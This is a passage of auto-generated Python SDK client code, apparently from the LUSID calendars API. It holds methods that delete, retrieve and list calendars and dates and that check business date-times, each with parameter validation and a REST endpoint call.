This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_date_from_calendar_with_http_info(scope, code, date_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str scope: Scope of the calendar (required)
:param str code: Code of the calendar (required)
:param str date_id: Identifier of the date to be removed (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(CalendarDate, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['scope', 'code', 'date_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_date_from_calendar" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'scope' is set
if ('scope' not in local_var_params or
local_var_params['scope'] is None):
raise ApiValueError("Missing the required parameter `scope` when calling `delete_date_from_calendar`") # noqa: E501
# verify the required parameter 'code' is set
if ('code' not in local_var_params or
local_var_params['code'] is None):
raise ApiValueError("Missing the required parameter `code` when calling `delete_date_from_calendar`") # noqa: E501
# verify the required parameter 'date_id' is set
if ('date_id' not in local_var_params or
local_var_params['date_id'] is None):
raise ApiValueError("Missing the required parameter `date_id` when calling `delete_date_from_calendar`") # noqa: E501
if ('scope' in local_var_params and
len(local_var_params['scope']) > 64):
raise ApiValueError("Invalid value for parameter `scope` when calling `delete_date_from_calendar`, length must be less than or equal to `64`") # noqa: E501
if ('scope' in local_var_params and
len(local_var_params['scope']) < 1):
raise ApiValueError("Invalid value for parameter `scope` when calling `delete_date_from_calendar`, length must be greater than or equal to `1`") # noqa: E501
if 'scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['scope']): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `delete_date_from_calendar`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
if ('code' in local_var_params and
len(local_var_params['code']) > 64):
raise ApiValueError("Invalid value for parameter `code` when calling `delete_date_from_calendar`, length must be less than or equal to `64`") # noqa: E501
if ('code' in local_var_params and
len(local_var_params['code']) < 1):
raise ApiValueError("Invalid value for parameter `code` when calling `delete_date_from_calendar`, length must be greater than or equal to `1`") # noqa: E501
if 'code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['code']): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `delete_date_from_calendar`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
if ('date_id' in local_var_params and
len(local_var_params['date_id']) > 64):
raise ApiValueError("Invalid value for parameter `date_id` when calling `delete_date_from_calendar`, length must be less than or equal to `64`") # noqa: E501
if ('date_id' in local_var_params and
len(local_var_params['date_id']) < 1):
raise ApiValueError("Invalid value for parameter `date_id` when calling `delete_date_from_calendar`, length must be greater than or equal to `1`") # noqa: E501
if 'date_id' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['date_id']): # noqa: E501
raise ApiValueError("Invalid value for parameter `date_id` when calling `delete_date_from_calendar`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'scope' in local_var_params:
path_params['scope'] = local_var_params['scope'] # noqa: E501
if 'code' in local_var_params:
path_params['code'] = local_var_params['code'] # noqa: E501
if 'date_id' in local_var_params:
path_params['dateId'] = local_var_params['date_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
# set the LUSID header
header_params['X-LUSID-SDK-Language'] = 'Python'
header_params['X-LUSID-SDK-Version'] = '0.11.3192'
return self.api_client.call_api(
'/api/calendars/generic/{scope}/{code}/dates/{dateId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CalendarDate', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_calendar(self, scope, code, **kwargs): # noqa: E501
"""[EXPERIMENTAL] Get a calendar in its generic form # noqa: E501
Retrieve a generic calendar by a specific ID at a point in AsAt time # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_calendar(scope, code, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str scope: Scope of the calendar identifier (required)
:param str code: Code of the calendar identifier (required)
:param datetime as_at: The AsAt datetime at which to retrieve the calendar
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Calendar
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_calendar_with_http_info(scope, code, **kwargs) # noqa: E501
def get_calendar_with_http_info(self, scope, code, **kwargs): # noqa: E501
"""[EXPERIMENTAL] Get a calendar in its generic form # noqa: E501
Retrieve a generic calendar by a specific ID at a point in AsAt time # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_calendar_with_http_info(scope, code, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str scope: Scope of the calendar identifier (required)
:param str code: Code of the calendar identifier (required)
:param datetime as_at: The AsAt datetime at which to retrieve the calendar
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Calendar, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['scope', 'code', 'as_at'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_calendar" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'scope' is set
if ('scope' not in local_var_params or
local_var_params['scope'] is None):
raise ApiValueError("Missing the required parameter `scope` when calling `get_calendar`") # noqa: E501
# verify the required parameter 'code' is set
if ('code' not in local_var_params or
local_var_params['code'] is None):
raise ApiValueError("Missing the required parameter `code` when calling `get_calendar`") # noqa: E501
if ('scope' in local_var_params and
len(local_var_params['scope']) > 64):
raise ApiValueError("Invalid value for parameter `scope` when calling `get_calendar`, length must be less than or equal to `64`") # noqa: E501
if ('scope' in local_var_params and
len(local_var_params['scope']) < 1):
raise ApiValueError("Invalid value for parameter `scope` when calling `get_calendar`, length must be greater than or equal to `1`") # noqa: E501
if 'scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['scope']): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `get_calendar`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
if ('code' in local_var_params and
len(local_var_params['code']) > 64):
raise ApiValueError("Invalid value for parameter `code` when calling `get_calendar`, length must be less than or equal to `64`") # noqa: E501
if ('code' in local_var_params and
len(local_var_params['code']) < 1):
raise ApiValueError("Invalid value for parameter `code` when calling `get_calendar`, length must be greater than or equal to `1`") # noqa: E501
if 'code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['code']): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `get_calendar`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'scope' in local_var_params:
path_params['scope'] = local_var_params['scope'] # noqa: E501
if 'code' in local_var_params:
path_params['code'] = local_var_params['code'] # noqa: E501
query_params = []
if 'as_at' in local_var_params:
query_params.append(('asAt', local_var_params['as_at'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
# set the LUSID header
header_params['X-LUSID-SDK-Language'] = 'Python'
header_params['X-LUSID-SDK-Version'] = '0.11.3192'
return self.api_client.call_api(
'/api/calendars/generic/{scope}/{code}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Calendar', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_dates(self, scope, code, **kwargs): # noqa: E501
"""[EXPERIMENTAL] Get dates for a specific calendar # noqa: E501
Get dates from a specific calendar within a specific window of effective time, at a point in AsAt time. Providing an id filter can further refine the results. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_dates(scope, code, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str scope: Scope of the calendar (required)
:param str code: Code of the calendar (required)
:param str from_effective_at: Where the effective window of dates should begin from
:param str to_effective_at: Where the effective window of dates should end
:param datetime as_at: AsAt the dates should be retrieved at
:param list[str] id_filter: An additional filter that will filter dates based on their identifer
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ResourceListOfCalendarDate
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_dates_with_http_info(scope, code, **kwargs) # noqa: E501
def get_dates_with_http_info(self, scope, code, **kwargs): # noqa: E501
"""[EXPERIMENTAL] Get dates for a specific calendar # noqa: E501
Get dates from a specific calendar within a specific window of effective time, at a point in AsAt time. Providing an id filter can further refine the results. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_dates_with_http_info(scope, code, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str scope: Scope of the calendar (required)
:param str code: Code of the calendar (required)
:param str from_effective_at: Where the effective window of dates should begin from
:param str to_effective_at: Where the effective window of dates should end
:param datetime as_at: AsAt the dates should be retrieved at
:param list[str] id_filter: An additional filter that will filter dates based on their identifer
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ResourceListOfCalendarDate, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['scope', 'code', 'from_effective_at', 'to_effective_at', 'as_at', 'id_filter'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_dates" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'scope' is set
if ('scope' not in local_var_params or
local_var_params['scope'] is None):
raise ApiValueError("Missing the required parameter `scope` when calling `get_dates`") # noqa: E501
# verify the required parameter 'code' is set
if ('code' not in local_var_params or
local_var_params['code'] is None):
raise ApiValueError("Missing the required parameter `code` when calling `get_dates`") # noqa: E501
if ('scope' in local_var_params and
len(local_var_params['scope']) > 64):
raise ApiValueError("Invalid value for parameter `scope` when calling `get_dates`, length must be less than or equal to `64`") # noqa: E501
if ('scope' in local_var_params and
len(local_var_params['scope']) < 1):
raise ApiValueError("Invalid value for parameter `scope` when calling `get_dates`, length must be greater than or equal to `1`") # noqa: E501
if 'scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['scope']): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `get_dates`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
if ('code' in local_var_params and
len(local_var_params['code']) > 64):
raise ApiValueError("Invalid value for parameter `code` when calling `get_dates`, length must be less than or equal to `64`") # noqa: E501
if ('code' in local_var_params and
len(local_var_params['code']) < 1):
raise ApiValueError("Invalid value for parameter `code` when calling `get_dates`, length must be greater than or equal to `1`") # noqa: E501
if 'code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['code']): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `get_dates`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
if ('from_effective_at' in local_var_params and
len(local_var_params['from_effective_at']) > 256):
raise ApiValueError("Invalid value for parameter `from_effective_at` when calling `get_dates`, length must be less than or equal to `256`") # noqa: E501
if ('from_effective_at' in local_var_params and
len(local_var_params['from_effective_at']) < 0):
raise ApiValueError("Invalid value for parameter `from_effective_at` when calling `get_dates`, length must be greater than or equal to `0`") # noqa: E501
if 'from_effective_at' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_\+:\.]+$', local_var_params['from_effective_at']): # noqa: E501
raise ApiValueError("Invalid value for parameter `from_effective_at` when calling `get_dates`, must conform to the pattern `/^[a-zA-Z0-9\-_\+:\.]+$/`") # noqa: E501
if ('to_effective_at' in local_var_params and
len(local_var_params['to_effective_at']) > 256):
raise ApiValueError("Invalid value for parameter `to_effective_at` when calling `get_dates`, length must be less than or equal to `256`") # noqa: E501
if ('to_effective_at' in local_var_params and
len(local_var_params['to_effective_at']) < 0):
raise ApiValueError("Invalid value for parameter `to_effective_at` when calling `get_dates`, length must be greater than or equal to `0`") # noqa: E501
if 'to_effective_at' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_\+:\.]+$', local_var_params['to_effective_at']): # noqa: E501
raise ApiValueError("Invalid value for parameter `to_effective_at` when calling `get_dates`, must conform to the pattern `/^[a-zA-Z0-9\-_\+:\.]+$/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'scope' in local_var_params:
path_params['scope'] = local_var_params['scope'] # noqa: E501
if 'code' in local_var_params:
path_params['code'] = local_var_params['code'] # noqa: E501
query_params = []
if 'from_effective_at' in local_var_params:
query_params.append(('fromEffectiveAt', local_var_params['from_effective_at'])) # noqa: E501
if 'to_effective_at' in local_var_params:
query_params.append(('toEffectiveAt', local_var_params['to_effective_at'])) # noqa: E501
if 'as_at' in local_var_params:
query_params.append(('asAt', local_var_params['as_at'])) # noqa: E501
if 'id_filter' in local_var_params:
query_params.append(('idFilter', local_var_params['id_filter'])) # noqa: E501
collection_formats['idFilter'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
# set the LUSID header
header_params['X-LUSID-SDK-Language'] = 'Python'
header_params['X-LUSID-SDK-Version'] = '0.11.3192'
return self.api_client.call_api(
'/api/calendars/generic/{scope}/{code}/dates', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResourceListOfCalendarDate', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def is_business_date_time(self, date_time, scope, code, **kwargs): # noqa: E501
"""[EXPERIMENTAL] Check whether a DateTime is a \"Business DateTime\" # noqa: E501
A Business DateTime is defined as a point in time that: * Does not represent a day that overlaps with the calendars WeekendMask * If the calendar is a \"Holiday Calendar\" Does not overlap with any dates in the calendar * If the calendar is a \"TradingHours Calendar\" Does overlap with a date in the calendar All dates specified must be UTC and the upper bound of a calendar is not inclusive e.g. From: 2020-12-25-00-00-00 To: 2020-12-26-00-00-00 IsBusinessDay(2020-12-26-00-00-00) == false # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.is_business_date_time(date_time, scope, code, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param datetime date_time: DateTime to check - This DateTime must be UTC (required)
:param str scope: Scope of the calendar (required)
:param str code: Code of the calendar (required)
:param datetime as_at: AsAt for the request
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IsBusinessDayResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.is_business_date_time_with_http_info(date_time, scope, code, **kwargs) # noqa: E501
def is_business_date_time_with_http_info(self, date_time, scope, code, **kwargs): # noqa: E501
"""[EXPERIMENTAL] Check whether a DateTime is a \"Business DateTime\" # noqa: E501
A Business DateTime is defined as a point in time that: * Does not represent a day that overlaps with the calendars WeekendMask * If the calendar is a \"Holiday Calendar\" Does not overlap with any dates in the calendar * If the calendar is a \"TradingHours Calendar\" Does overlap with a date in the calendar All dates specified must be UTC and the upper bound of a calendar is not inclusive e.g. From: 2020-12-25-00-00-00 To: 2020-12-26-00-00-00 IsBusinessDay(2020-12-26-00-00-00) == false # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.is_business_date_time_with_http_info(date_time, scope, code, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param datetime date_time: DateTime to check - This DateTime must be UTC (required)
:param str scope: Scope of the calendar (required)
:param str code: Code of the calendar (required)
:param datetime as_at: AsAt for the request
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IsBusinessDayResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['date_time', 'scope', 'code', 'as_at'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method is_business_date_time" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'date_time' is set
if ('date_time' not in local_var_params or
local_var_params['date_time'] is None):
raise ApiValueError("Missing the required parameter `date_time` when calling `is_business_date_time`") # noqa: E501
# verify the required parameter 'scope' is set
if ('scope' not in local_var_params or
local_var_params['scope'] is None):
raise ApiValueError("Missing the required parameter `scope` when calling `is_business_date_time`") # noqa: E501
# verify the required parameter 'code' is set
if ('code' not in local_var_params or
local_var_params['code'] is None):
raise ApiValueError("Missing the required parameter `code` when calling `is_business_date_time`") # noqa: E501
if ('scope' in local_var_params and
len(local_var_params['scope']) > 64):
raise ApiValueError("Invalid value for parameter `scope` when calling `is_business_date_time`, length must be less than or equal to `64`") # noqa: E501
if ('scope' in local_var_params and
len(local_var_params['scope']) < 1):
raise ApiValueError("Invalid value for parameter `scope` when calling `is_business_date_time`, length must be greater than or equal to `1`") # noqa: E501
if 'scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['scope']): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `is_business_date_time`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
if ('code' in local_var_params and
len(local_var_params['code']) > 64):
raise ApiValueError("Invalid value for parameter `code` when calling `is_business_date_time`, length must be less than or equal to `64`") # noqa: E501
if ('code' in local_var_params and
len(local_var_params['code']) < 1):
raise ApiValueError("Invalid value for parameter `code` when calling `is_business_date_time`, length must be greater than or equal to `1`") # noqa: E501
if 'code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['code']): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `is_business_date_time`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'scope' in local_var_params:
path_params['scope'] = local_var_params['scope'] # noqa: E501
if 'code' in local_var_params:
path_params['code'] = local_var_params['code'] # noqa: E501
query_params = []
if 'date_time' in local_var_params:
query_params.append(('dateTime', local_var_params['date_time'])) # noqa: E501
if 'as_at' in local_var_params:
query_params.append(('asAt', local_var_params['as_at'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
# set the LUSID header
header_params['X-LUSID-SDK-Language'] = 'Python'
header_params['X-LUSID-SDK-Version'] = '0.11.3192'
return self.api_client.call_api(
'/api/calendars/businessday/{scope}/{code}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IsBusinessDayResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_calendars(self, **kwargs): # noqa: E501
"""[EXPERIMENTAL] List Calenders # noqa: E501
List calendars at a point in AsAt time. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_calendars(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param datetime as_at: The AsAt datetime at which to retrieve the calendars
:param str page: The pagination token to use to continue listing calendars from a previous call to list calendars. This value is returned from the previous call. If a pagination token is provided the sortBy, filter, and asAt fields must not have changed since the original request. Also, if set, a start value cannot be provided.
:param int limit: When paginating, limit the number of returned results to this many.
:param str filter: Expression to filter the result set. Read more about filtering results from LUSID here https://support.lusid.com/filtering-results-from-lusid.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: PagedResourceListOfCalendar
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_calendars_with_http_info(**kwargs) # noqa: E501
def list_calendars_with_http_info(self, **kwargs): # noqa: E501
"""[EXPERIMENTAL] List Calenders # noqa: E501
List calendars at a point in AsAt time. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_calendars_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param datetime as_at: The AsAt datetime at which to retrieve the calendars
:param str page: The pagination token to use to continue listing calendars from a previous call to list calendars. This value is returned from the previous call. If a pagination token is provided the sortBy, filter, and asAt fields must not have changed since the original request. Also, if set, a start value cannot be provided.
:param int limit: When paginating, limit the number of returned results to this many.
:param str filter: Expression to filter the result set. Read more about filtering results from LUSID here https://support.lusid.com/filtering-results-from-lusid.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(PagedResourceListOfCalendar, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['as_at', 'page', 'limit', 'filter'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_calendars" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
if 'limit' in local_var_params and local_var_params['limit'] > 5000: # noqa: E501
raise ApiValueError("Invalid value for parameter `limit` when calling `list_calendars`, must be a value less than or equal to `5000`") # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] < 1: # noqa: E501
raise ApiValueError("Invalid value for parameter `limit` when calling `list_calendars`, must be a value greater than or equal to `1`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'as_at' in local_var_params:
query_params.append(('asAt', local_var_params['as_at'])) # noqa: E501
if 'page' in local_var_params:
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'limit' in local_var_params:
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'filter' in local_var_params:
query_params.append(('filter', local_var_params['filter'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
# set the LUSID header
header_params['X-LUSID-SDK-Language'] = 'Python'
header_params['X-LUSID-SDK-Version'] = '0.11.3192'
return self.api_client.call_api(
'/api/calendars/generic', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PagedResourceListOfCalendar', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_calendars_in_scope(self, scope, **kwargs): # noqa: E501
"""[EXPERIMENTAL] List all calenders in a specified scope # noqa: E501
List calendars at a point in AsAt time. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_calendars_in_scope(scope, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str scope: Scope of the calendars (required)
:param datetime as_at: The AsAt datetime at which to retrieve the calendars
:param str page: The pagination token to use to continue listing calendars from a previous call to list calendars. This value is returned from the previous call. If a pagination token is provided the sortBy, filter, and asAt fields must not have changed since the original request. Also, if set, a start value cannot be provided.
:param int start: When paginating, skip this number of results.
:param int limit: When paginating, limit the number of returned results to this many.
:param str filter: Expression to filter the result set. Read more about filtering results from LUSID here https://support.lusid.com/filtering-results-from-lusid.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: PagedResourceListOfCalendar
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_calendars_in_scope_with_http_info(scope, **kwargs) # noqa: E501
def list_calendars_in_scope_with_http_info(self, scope, **kwargs): # noqa: E501
"""[EXPERIMENTAL] List all calenders in a specified scope # noqa: E501
List calendars at a point in AsAt time. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_calendars_in_scope_with_http_info(scope, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str scope: Scope of the calendars (required)
:param datetime as_at: The AsAt datetime at which to retrieve the calendars
:param str page: The pagination token to use to continue listing calendars from a previous call to list calendars. This value is returned from the previous call. If a pagination token is provided the sortBy, filter, and asAt fields must not have changed since the original request. Also, if set, a start value cannot be provided.
:param int start: When paginating, skip this number of results.
:param int limit: When paginating, limit the number of returned results to this many.
:param str filter: Expression to filter the result set. Read more about filtering results from LUSID here https://support.lusid.com/filtering-results-from-lusid.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(PagedResourceListOfCalendar, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['scope', 'as_at', 'page', 'start', 'limit', 'filter'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_calendars_in_scope" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'scope' is set
if ('scope' not in local_var_params or
local_var_params['scope'] is None):
raise ApiValueError("Missing the required parameter `scope` when calling `list_calendars_in_scope`") # noqa: E501
if ('scope' in local_var_params and
len(local_var_params['scope']) > 64):
raise ApiValueError("Invalid value for parameter `scope` when calling `list_calendars_in_scope`, length must be less than or equal to `64`") # noqa: E501
